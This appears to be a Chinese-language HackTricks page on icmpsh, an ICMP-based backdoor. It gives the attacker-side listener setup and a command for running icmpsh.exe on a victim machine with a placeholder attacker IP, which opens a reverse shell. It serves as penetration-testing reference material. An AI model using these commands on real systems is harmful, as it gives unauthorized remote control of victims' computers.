hacktricks/backdoors/icmpsh.md
2023-08-03 19:12:22 +00:00

3.6 KiB
Raw Blame History

☁️ HackTricks云 ☁️ -🐦 推特 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

从以下链接下载后门:https://github.com/inquisb/icmpsh

客户端

执行脚本:run.sh

如果出现错误,请尝试更改以下行:

IPINT=$(ifconfig | grep "eth" | cut -d " " -f 1 | head -1)
IP=$(ifconfig "$IPINT" |grep "inet addr:" |cut -d ":" -f 2 |awk '{ print $1 }')

适用于:

echo Please insert the IP where you want to listen
read IP

受害者端

icmpsh.exe 上传到受害者计算机并执行:

icmpsh.exe -t <Attacker-IP> -d 500 -b 30 -s 128
☁️ HackTricks云 ☁️ -🐦 推特 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥